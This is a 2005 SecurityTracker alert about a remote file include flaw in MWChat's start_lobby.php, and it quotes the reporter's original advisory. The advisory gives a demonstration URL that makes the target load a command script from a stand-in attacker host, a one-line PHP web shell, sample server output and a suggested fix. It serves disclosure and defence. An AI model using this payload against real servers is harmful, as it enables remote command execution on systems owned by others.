SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Instant Messaging/IRC/Chat)  >  MWChat Vendors:  AppIndex
MWChat Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014090
SecurityTracker URL:  http://securitytracker.com/id?1014090
CVE Reference:  CAN-2005-1869   (Links to External Site)
Updated:  Jun 9 2005
Original Entry Date:  Jun 2 2005
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 6.8
Description:  Status-x reported a vulnerability in MWChat. A remote user can execute arbitrary commands on the target system.

The 'start_lobby.php' script includes the 'chat_maintainance.php' script relative to the user-supplied '$CONFIG[MWCHAT_Libs]' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=u name%20-a

The original advisory is available at:

http://www.defacers.com.mx/advisories/4.txt

[Editor's note: The vendor's distribution includes default '.htaccess' files for several directories, including the 'libs' directory. Only systems where the '.htaccess' file has been removed or modified are affected.]
Impact:  A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:  The vendor has issued a fixed version (6.8), available at:

http://www.appindex.net/products/detail/?product=mwchat
Vendor URL:  www.appindex.net/products/detail/?product=mwchat (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Status-x <phr4xz@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Wed, 1 Jun 2005 19:42:03 -0500
From:  Status-x <phr4xz@gmail.com>
Subject:  MW Chat Remote File Include

 
 
#####################################################################
MW CHAT Version 6.xx Remote File Include
Affected Script: start_lobby.php
Vendor: http://www.appindex.net
Vendor Response: None i Suppose because the site is not updated since
                 2003
Vendor Confirmed: No but i confirmed  ;) 
 
Http://www.defacers.com.mx/advisories/4.txt - Advisory #4
 
Author: Status-x             E-mail: phr4xz@gmail.com
 
####################################################################
 
====================================================================
 
 
Description:
 
MW CHAT its a free chat system wich allows users to comunicate with
 
emoticons, colors and with a good visual design.
 
 
====================================================================
 
 
Vulnerability Description:
 
 
The bug is inside the "libs" DIR and also is located in other files
 
but in the other files the vulnerability cannot be confirmed
 
Lets take a look into the start_lobby.php source:
 
 
*********************************************************************
$Sequence = $STATUS[CLIENT_IP]; $Sequence_Check
= base64_encode($Sequence); 
include("$CONFIG[MWCHAT_Libs]/chat_maintainance.php"); 
$rgLobby_SELECT = db_query(Validate(3), $CONN); $szResult
= db_numrows($rgLobby_SELECT); if ($szResult == "0") 
*********************************************************************
 
And as we can see in all the source code the $CONFIG[MWCHAT_Libs]
 
variable its not defined so we can make a cmd.txt file with the next
 
source
 
 
***************
 
<?
 
system($cmd)
 
?>
 
***************
 
 
Then we upload that file into a webserver and can execute *NIX CMD
 
into the affected server or site
 
 
http://silly.com
/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://evil/cmd.txt?&cmd=uname
-a
 
 
And we will get a nice answer from the affected server
 
 
*******************************************************
 
Linux ass 2.4.29-rc1 #1 SMP Fri Jan 7 17:47:33 MST 2005
 
*******************************************************
 
 
====================================================================
 
 
How to Fix:
 
 
The vendor didnt replied but i suppose changing the affected source
 
with the next one the trouble should be corrected  ;) 
 
 
*********************************************************************
$Sequence = $STATUS[CLIENT_IP]; $Sequence_Check
= base64_encode($Sequence); 
include("/libs/chat_maintainance.php"); 
$rgLobby_SELECT = db_query(Validate(3), $CONN); $szResult
= db_numrows($rgLobby_SELECT); if ($szResult == "0") 
*********************************************************************
 
 
Or xD hehehe try to contact the vendor  ;) 
 
 
====================================================================
 
 
Credits and Contact:
 
 
This vulnerability was discovered by Status-x | phr4xz@gmail.com
 
 
Http://www.defacers.com.mx
 
 
01 June 2005
 
====================================================================


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2005, SecurityGlobal.net LLC